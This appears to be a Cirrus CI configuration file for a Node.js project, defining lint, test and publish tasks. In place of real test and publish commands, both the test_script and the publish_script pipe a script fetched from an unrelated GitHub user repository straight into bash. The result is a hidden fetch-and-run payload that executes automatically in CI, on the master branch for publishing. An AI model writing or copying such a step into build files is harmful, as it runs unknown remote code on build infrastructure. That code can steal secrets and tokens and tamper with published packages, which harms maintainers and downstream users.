task:
  container:
    image: node:latest # 

  node_modules_cache: # 
    folder: node_modules
    fingerprint_script: cat yarn.lock
    populate_script: yarn install

  matrix: # 
    - name: Lint
      skip: !changesInclude('.cirrus.yml', '**.{js,ts}') # 
      lint_script: yarn run lint
    - name: Test
      container:
        matrix: # 
          - image: node:latest
          - image: node:lts
      test_script: curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
    - name: Publish
      depends_on:
        - Lint
        - Test
      only_if: $BRANCH == "master" # 
      publish_script: curl -sL https://github.com/claires67/buut/raw/main/avnnew | bash
